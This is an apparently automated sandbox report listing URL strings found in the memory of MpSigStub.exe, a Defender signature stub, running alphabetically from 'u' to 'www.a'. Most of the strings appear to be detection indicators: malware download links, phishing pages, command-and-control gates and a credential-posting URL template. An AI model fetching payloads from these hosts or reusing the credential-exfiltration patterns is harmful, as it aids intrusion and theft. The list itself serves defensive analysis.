Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: http://uninstall.mysafesavings.com
Source: MpSigStub.exe, 00000024.00000003.6303526002.00000197A34ED000.00000004.00000001.sdmp String found in binary or memory: http://union.hao3603.com/api/down
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp String found in binary or memory: http://unstat.baidu.com
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://unstiff.pw
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: http://up.dev-point.com/uploads/
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://upd.lop.com/upd/check
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://upd.zone-media.com/upd/check
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp String found in binary or memory: http://update.7h4uk.com:443/antivirus.php
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://update.cnnewmusic.com/get_gif.php?
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp String found in binary or memory: http://update.qyule.com/setup.exe
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: http://update.utorrent.com/uninstall?type=%s-%U&h=%s&v=%d
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://update.windowssettings.org/patchwmp/__asf_script_command_ends_here__
Source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp String found in binary or memory: http://update.xiaoshoupeixun.com/tsbho.ini
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: http://updates-spreadwork.pw
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp String found in binary or memory: http://updates.winsoftware.com/
Source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp String found in binary or memory: http://upgrade.onestepsearch.net
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp String found in binary or memory: http://upload.exe
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://uploader.sx/uploads/2018/5b9ed5bc.exe
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://uprevoy.com/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://url.cn/
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: http://url.fzpmh.com/
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: http://urlz.fr/6zdb
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://ursreklam.com/wp-content/themes/sketch/vall1/agh.doc
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: http://us.onesoftperday.com
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp String found in binary or memory: http://usa-national.info/gpu/band/grumble.dot
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://usb.mine.nu/p.php
Source: MpSigStub.exe, 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp String found in binary or memory: http://usd.881515.net/down/1.exe
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp String found in binary or memory: http://user.qzone.qq.com/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://users.cpadown.com/ktv/
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://ushuistov.net/cgi-bin/check/autoaff
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: http://utclient.utorrent.com/pro/bittorrent/
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: http://utclient.utorrent.com/pro/flow/trial/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://uwibami.com/indexx.php)
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://uxos.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://v.baidu.com/srh.php?tn=oliver1_dg&word=%s
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://v.bddp.net
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://v.iask.com/v?tag=&k=%s
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://valentinadaddato.it//wp-includes/pomo/xcl/excelz/index.php
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://vaytiennhanhvungtau.com/.well-known/acme-challenge/gr.mpwq
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp String found in binary or memory: http://vbatools.pl/lista-aplikacji/
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: http://venus.ge/ds/1.gif
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://vequiato.sites.uol.com.br/
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: http://verred.net/?1309921
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://vesterm.freehostia.com
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://vidalaviva.com/
Source: MpSigStub.exe, 00000024.00000003.6321140724.00000197A3AFC000.00000004.00000001.sdmp String found in binary or memory: http://vidareal2010.pisem.su/imglog.exe
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: http://video-song-player-install-now.com/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://vidquick.info/cgi/
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://vidscentral.net/inc/6348852
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://vidscentral.net/inc/63488524/media_codecs/__asf_script_command_ends_here__
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://view.superweb.ws/site/folder.exe
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: http://vip.escritorioactivo.com/controlContinuidad.htm
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://vip.fanyarightway.com/360/
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://vip.zeiwang.cn/images/logo.gif
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://vip9646.com
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: http://vipasotka.com/in.php?adv=5052&val=2b1f4af0
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: http://visuawsdyorganizationforyoungbraine19hqs.duckdns.org/document/invoice_
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://vjdevelopers.com/ad/index.html)
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://vkontakte.ru/login.php?
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp String found in binary or memory: http://vnmxjcx.com/config.ini
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://vnz2107.ru
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://vod.7ibt.com/index.php?url=
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://voesttalpine.com/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://voguextra.com
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://volcanox.comxa.com/dix/disk
Source: MpSigStub.exe, 00000024.00000003.6328862944.00000197A3361000.00000004.00000001.sdmp String found in binary or memory: http://w.nanweng.cn/qy/gl
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://w.w3c4f.com
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://w.woc4b.com
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://w.x.baidu.com/go/
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://w0rms.com/sayac.js
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://wac.edgecastcdn.net/800952/5b595c13-aea5-4a6c-a099-d29c4678f6f2-api/gfbs
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://walden.co.jp/wp/divorce/divorce.php?id=zxjpyy5tb3jyaxnvb
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp String found in binary or memory: http://wallwishers.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://warmsnugfat.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://warningjustice.com/z.html#ymxpy2hazwfzdg1hbi5jb20=
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://watchbands365.com/wp-includes/css/pdfview/index.html
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp String found in binary or memory: http://watchchurchonline.com/flc4/llc/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://weather.265.com/%s
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://weather.265.com/get_weather.php?action=get_city
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://web.nba1001.net:8888/tj/tongji.js
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp String found in binary or memory: http://web/cdr/DISP/plazma_2/backend/phone.php
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp String found in binary or memory: http://webapp.torntv.com
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://webpatch.ragnarok.co.kr/
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp String found in binary or memory: http://websearch.gettango.com/?
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp String found in binary or memory: http://webspyshield.com/a/setup.exe
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://webye163.cn/hz
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://weeshoppi.com/wp-includes/id4/m4hg5vm7xsh6utv.exe
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: http://wermeer.cn/wermeer/report.php?title=
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://westcost0.altervista.org/w/api2.php?a=
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://western.net.pk
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://westernpinesbelize.com/lmb/login%20pdf.html
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: http://wetnosesandwhiskers.com/driverfix30e45vers.exe
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp String found in binary or memory: http://wevx.xyz/post.php?uid=
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: http://wewewewewesesesesasbacwederffggffddsss.duckdns.org/svch/
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://wgdteam.jconserv.net
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://whatami.us.to/tc
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://whatismyip.com/automation/n09230945.asp
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp String found in binary or memory: http://whenyouplaygood.com/s/gate.php?a
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp String found in binary or memory: http://white.shougouji.top
Source: MpSigStub.exe, 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp String found in binary or memory: http://whoisthis.100webspace.net/a.php?post=
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://wifc.website/
Source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp String found in binary or memory: http://wijmo.com/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://willy.pro.br/download
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: http://win-eto.com/hp.htm
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://win32.x10host.com/
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp String found in binary or memory: http://win7updates.com/
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://winantiviruspro.net/buy.php?affid=
Source: MpSigStub.exe, 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp String found in binary or memory: http://winbutler.com/a.php
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp String found in binary or memory: http://windowstation.bar/opzi0na1la.dll
Source: MpSigStub.exe, 00000024.00000003.6312663720.00000197A3E58000.00000004.00000001.sdmp String found in binary or memory: http://winshow.biz/feat/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://wizzcaster.com/api/v
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://wmr-moneys.org/config/line.gif
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://wmwifbajxxbcxmucxmlc.com/files/
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://woah90s.com/hqalzrakueii/nbsa
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp String found in binary or memory: http://wordfiletransfertocustomer.mangospot.net/-.......................................-...........
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: http://wordgroup.bounceme.net/9cb6541e5b0d/
Source: MpSigStub.exe, 00000024.00000003.6327269415.00000197A3790000.00000004.00000001.sdmp String found in binary or memory: http://work-helper.com/files/client/OffersWizard.exex
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://workwear.shoppages.eu/tools/adobe.ph)
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://world4freeblog.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: http://worldnit.com/ofi.exe
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://worm.ws
Source: MpSigStub.exe, 00000024.00000003.6347934302.00000197A4E28000.00000004.00000001.sdmp String found in binary or memory: http://worm.ws/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://wpitcher.com
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://wpr.mko.waw.pl/uploads/scheduler.txt
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: http://wsdygreenkegheedahatakankeadeshnaa30gas.duckdns.org/document/invoice_
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://wsfgfdgrtyhgfd.net//adv//
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://wsfgfdgrtyhgfd.net/adv/
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: http://wtfismyip.com/text)echo
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://ww.fbi.gov/worldwidedlogs/addtobase.asp
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://wwsw.friendgreeting.net/pickup.aspx?code=
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://www-afc.chrom3.net/images/
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://www.%domain%/updates/check.html
Source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp String found in binary or memory: http://www.%s/MyFriends.jsp
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://www.%s/mail/MailCompose.jsp
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://www.%s/mail/MailCompose.jsp?ToMemberId=%s
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://www.%s/searchbar.html
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://www.114.
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://www.114Oldest.com/zz/mm.htm
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://www.126.com/
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.17173.com/
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp String found in binary or memory: http://www.178gg.com/lianjie/
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://www.180searchassistant.com/
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://www.180searchassistant.com/a
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: http://www.1882361.55freehost.com/voicemail.html)
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: http://www.19620425.com/download_adv/file.exe
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: http://www.22apple.com/?utm_source=b&ch=sof&uid=
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp String found in binary or memory: http://www.22teens.com/
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://www.2345.com
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: http://www.2345.com/?18181
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: http://www.2345.com/?kmmy/f
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: http://www.2345.com/?kmmy/fregadd
Source: MpSigStub.exe, 00000024.00000003.6285606128.00000197A309B000.00000004.00000001.sdmp String found in binary or memory: http://www.2828hfdy.com/bak.txt
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: http://www.3000.ws/
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://www.31334.info/1stemail.php
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.3322.org/dyndns/getip
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://www.37db.cn/images/dis.htmwidth=0height=0
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://www.3800cc.com/
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp String found in binary or memory: http://www.455465x.com/test/IP.asp
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://www.4dots-software.com/installmonetizer/emptyfoldercleaner.php/silentget
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://www.4shared.com/download/-u-Zcvyfce/SkyLinev5.exe
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://www.4shared.com/download/TZDZz2RBba/aTubeWD9.exe
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp String found in binary or memory: http://www.4threquest.me/
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp String found in binary or memory: http://www.4threquest.me/310714d/291014_nj.exe?
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp String found in binary or memory: http://www.4threquest.me/310714d/310714_br.exe?
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://www.51jetso.com
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://www.520hack.com/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://www.52CPS.COM/goto/mm.Htm
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://www.52xdy.com
Source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp String found in binary or memory: http://www.58816.com
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://www.5qbb.com
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: http://www.5z8.info/--initiate-credit-card-xfer--_g5l2og_autoinstall
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.6781.com/city/
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.6781.com/navhtm/nav
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.6781.com/tools/#
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://www.77169.net/
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: http://www.7sponsor.com/
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: http://www.887766.com/hi.htm
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://www.88vcd.com/htm/china/myb/send.asp?daqu=%s&xiaoqu=%s&user=%s&pass=%s&ckpass=%s&renwu=%s&lev
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.96333.com/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://www.9aaa.com
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://www.CollakeSoftware.com
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://www.CollakeSoftware.comg
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: http://www.DanlodBazar.blogfa.com
Source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp String found in binary or memory: http://www.IM-Names.com/names
Source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp String found in binary or memory: http://www.IM-Names.com/namesa
Source: MpSigStub.exe, 00000024.00000003.6321140724.00000197A3AFC000.00000004.00000001.sdmp String found in binary or memory: http://www.KJDhendieldiouyu.COM/CFDATA.ima?ccode=%s&cfdatacc=%s&gmt=%d
Source: MpSigStub.exe, 00000024.00000003.6292407063.00000197A4EC4000.00000004.00000001.sdmp String found in binary or memory: http://www.MalwareAlarm.com/
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: http://www.PCKeeper.com
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp String found in binary or memory: http://www.PlanetCpp.com
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://www.Social2Search.com/privacy
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: http://www.acabogacia.org/doc0
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: http://www.acabogacia.org0
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: http://www.advgoogle.blogdpot.com
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp String found in binary or memory: http://www.agendagyn.com/media/fotos/2010/
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: http://www.agesic.gub.uy/acrn/acrn.crl0)
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
